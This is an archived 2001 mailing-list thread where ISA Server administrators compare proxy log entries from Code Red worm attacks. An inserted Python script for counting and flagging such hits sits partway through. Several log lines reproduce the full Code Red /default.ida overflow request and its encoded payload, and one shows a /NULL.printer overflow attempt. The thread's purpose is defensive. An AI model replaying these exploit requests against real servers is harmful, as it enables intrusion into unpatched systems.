RE: FW: Alert: New version of Code Red, XXXX

Wow, don't know what happened to those last 2 emails.

After a few days of portscans (all successfully blocked) I finally
started getting Code Red attacks. Some interesting info on the attacks.
A few of the source IPs have been pretty thorough about hitting every
possible combination in the ObjectName field. Regardless of their
configuration all attempts have been blocked.

From a few of the log entries - Initial portion of ObjectName field
***************************************************************************
http://www.worm.com/default.ida     
http://207.225.151.2/default.ida        ISA external ip address
http://207.225.151.1/default.ida        ISA external ip address
http://TANIS/default.ida                   an internal web server name
(not sure how that was gotten. Although, I was in the process of setting
up a new site and IPs (ISAs and the web servers) around the time some
of the requests hit). ????


This is the log entry of a standard Code Red
***************************************************

207.91.144.219, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy,
PALIN, -, www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET,
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u
8b00%u531b%u53ff%u0078%u0000%u00=a, -, -, 12202, 0x0, Default rule, -


Check out the end of the ObjectName field in this one (/NULL.printer).
Not a standard Code Red but looks like they attempt a buffer overrun.
***************************************************************************

216.29.225.188, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy,
PALIN, -, [host field: a long run of non-printable bytes, mis-encoded in
the archive], -, 0, 80, 1182, 0, -, TCP, GET,
http://[the same run of non-printable bytes]/NULL.printer, -, -, 12202,
0x0, Default rule, -



Michael

"Never attribute to malice that which can be adequately explained by
stupidity." Hanlon's Razor 
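One way to get the "quick count" Shayne suggests below (grep for default.ida?XXX) and also catch hits that do not use the old NNNN/XXXX filler, as Russ warns, is to parse the log lines themselves. This is an added example, not code from the thread or from ISA Server; it assumes the comma-separated field positions seen in the quoted W3ReverseProxy lines (client IP first, destination host tenth, URL nineteenth, result code twenty-second) and treats 12202 as the block result, as Jim describes. It also splits targets into IP literals versus hostnames, which is Shayne's point about name-based publishing.

```python
import re
from collections import Counter

# Constructed sample lines in the comma-separated ISA Server W3ReverseProxy
# layout seen in the thread (an IP-targeted hit, a hostname-targeted hit, a
# /NULL.printer request, and a normal request). The filler after "?" is
# shortened. Field positions are assumed from the sample lines, not from docs.
SAMPLE_LOG = """\
207.91.144.219, anonymous, -, N, 8/5/2001, 9:46:00, W3ReverseProxy, PALIN, -, www.worm.com, -, 0, 3966, 4039, 0, -, TCP, GET, http://www.worm.com/default.ida?NNNNNNNN%u9090%u6858=a, -, -, 12202, 0x0, Default rule, -
216.227.101.189, anonymous, -, N, 8/5/2001, 0:25:02, W3ReverseProxy, MIDAS, -, 216.87.141.208, -, 0, 1692, 3818, 0, -, TCP, GET, http://216.87.141.208/default.ida?XXXXXXXX%u9090=a, -, -, 12202, 0x0, Default rule, -
216.29.225.188, anonymous, -, N, 8/5/2001, 10:23:34, W3ReverseProxy, PALIN, -, TANIS, -, 0, 80, 1182, 0, -, TCP, GET, http://TANIS/NULL.printer, -, -, 12202, 0x0, Default rule, -
10.0.0.5, anonymous, -, N, 8/5/2001, 10:30:00, W3ReverseProxy, PALIN, -, www.example.test, -, 0, 200, 512, 0, -, TCP, GET, http://www.example.test/index.htm, -, -, 200, 0x0, Default rule, -
"""

BLOCKED_RESULT = "12202"   # result code the thread identifies as an ISA block
OLD_SIG = re.compile(r"/default\.ida\?(N{4,}|X{4,})")   # original Code Red filler
IP_LITERAL = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def parse_line(line):
    f = [x.strip() for x in line.split(",")]   # the URL field holds no commas
    if len(f) < 22:
        return None
    return {"src": f[0], "dest_host": f[9], "url": f[18], "result": f[21]}

def classify(rec):
    url = rec["url"].lower()
    if "/default.ida" in url:
        return "codered-nnnn" if OLD_SIG.search(rec["url"]) else "default.ida-other"
    if "/null.printer" in url:
        return "null.printer"
    return None

def summarize(log_text):
    """Count suspicious hits per source IP, per request kind and per target
    style, and flag any that ISA did not answer with the block result code."""
    by_src, by_kind, by_target = Counter(), Counter(), Counter()
    unblocked = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        kind = classify(rec) if rec else None
        if kind is None:
            continue
        by_src[rec["src"]] += 1
        by_kind[kind] += 1
        by_target["ip-literal" if IP_LITERAL.match(rec["dest_host"]) else "hostname"] += 1
        if rec["result"] != BLOCKED_RESULT:
            unblocked.append((rec["src"], rec["url"]))
    return {"by_src": by_src, "by_kind": by_kind, "by_target": by_target, "unblocked": unblocked}
```

Anything that lands in `unblocked` is a request the proxy passed through and deserves a look at the published web server behind it.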

-----Original Message-----
From: Tim Buenz [mailto:tbuenz@xxxxxxxxxxxxxxxxxxxxxxxxxxxx] 
Sent: Sunday, August 05, 2001 11:25 AM
To: [ISAserver.org Discussion List]
Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX


http://www.ISAserver.org


Hi,

Have been lurking and watching the "new code red worm" comments on the
list. Checked my proxy log just now to find this:

62.154.210.21   anonymous       -       2001-08-05      15:49:44
JSCS-3  -       www.worm.com    -       -       21031   4039    -
-       GET
http://www.worm.com/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u
8b00%u531b%u53ff%u0078%u0000%u00=a      -       12202

In reading Jim's post below ISA must have blocked the attempt- :>)
-- 
Tim Buenz
Director of Technology 
Jefferson-Scranton Comm. Schools
204 West Madison St.
Jefferson, IA 50129
(515)386-9256
http://www.jefferson-scranton.k12.ia.us

On Sunday, August 5, 2001 11:16 AM, Jim Harrison <jim@xxxxxxxxxxxx>
wrote:
>
>Sho did; that's what the "12202" entry is.   ISA says "go away boy, ya
>bother me."
>
>Jim Harrison
>MCP(2K), A+, Network+, PCG
>
>----- Original Message -----
>From: "Mark Strangways" <strangconst@xxxxxxxx>
>To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
>Sent: Sunday, August 05, 2001 8:41 AM
>Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
>
>
>
>Cool, got hit. I hope ISA blocked it :)
>
>----- Original Message -----
>From: "Thomas W. Shinder" <tshinder@xxxxxxxxxxxxxxxxxx>
>To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
>Sent: Sunday, August 05, 2001 11:35 AM
>Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
>
>
>
>My log entry:
>
>216.227.101.189, anonymous, -, N, 8/5/2001, 0:25:02, W3ReverseProxy, 
>MIDAS, -, 216.87.141.208, -, 0, 1692, 3818, 0, -, TCP, GET, 
>http://216.87.141.208/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090
>%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003
>%u8b00%u531b%u53ff%u0078%u0000%u00=a, -, -, 12202, 0x0, Default rule, -
>
>Thomas W Shinder, M.D., MCSE, MCT
>
>
>
>-----Original Message-----
>From: Shayne Lebrun [mailto:slebrun@xxxxxxxxxxx]
>Sent: Sunday, August 05, 2001 7:22 AM
>To: [ISAserver.org Discussion List]
>Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
>
>
>
>Look for default.ida?XXX for a quick count.  69 against my ISA server 
>so far.  Uses IP addresses, so as long as your web publishing is name 
>based, it'll still go splat.  If this guy had been intelligent to do 
>reverse DNS lookups, then hit the DNS name, some would wind up getting 
>through, and (presumably :-) go splat against the patch installed.  Or 
>the fact that one has removed the index server script mappings, unless 
>one is actually using script mappings. :-)
>
>As usual, Slashdot (http://slashdot.org) has information and lively 
>discussion on this very topic.
>
>-----Original Message-----
>From: Thomas W. Shinder [mailto:tshinder@xxxxxxxxxxxxxxxxxx]
>Sent: Sunday, August 05, 2001 12:10 AM
>To: [ISAserver.org Discussion List]
>Subject: [isalist] RE: FW: Alert: New version of Code Red, XXXX
>
>
>
>Hi Hugo,
>
>Thanks for the heads-up. I'll look for signs of this in my Web Proxy 
>logs.
>
>Tom
>www.isaserver.org/shinder
>
>
>Thomas W Shinder, M.D., MCSE, MCT
>
>
>
>-----Original Message-----
>From: Hugo Caye [mailto:Hugo@xxxxxxxxxxxxx]
>Sent: Saturday, August 04, 2001 10:59 PM
>To: [ISAserver.org Discussion List]
>Subject: [isalist] FW: Alert: New version of Code Red, XXXX
>
>
>
>FYI
>
>-----Original Message-----
>From: Russ [mailto:Russ.Cooper@xxxxxxxx]
>Sent: Sunday, August 05, 2001 00:48
>To: NTBUGTRAQ@xxxxxxxxxxxxxxxxxxxxxx
>Subject: Alert: New version of Code Red, XXXX
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Just a quick FYI, there is a new version of Code Red which appears to 
>be spreading rather rapidly.
>
>- - Appears to be a new re-write.
>
>- - Drops some sort of remote access trojan.
>
>- - Turns off System File Checker (Windows File Protection.)
>
>- - Moves CMD.EXE to the scripts directory in IIS
>
>- - Looks like the way they make the entry into code very differently 
>than before.
>
>- - If your IDS is looking for "NNNN", forget it (but then you should 
>have been shot if you used this string anyway)
>
>Cheers,
>Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
>
>p.s. if we don't respond right away its because we're now going to go 
>and light the fireworks here at my retreat. Might as well have lots of 
>fireworks tonight!
>
>
>
>
>
>------------------------------------------------------
>You are currently subscribed to this ISAserver.org Discussion List as: 
>tshinder@xxxxxxxxxxxxxxxxxx To unsubscribe send a blank email to
>leave-isalist-244621U@xxxxxxxxxxxxx
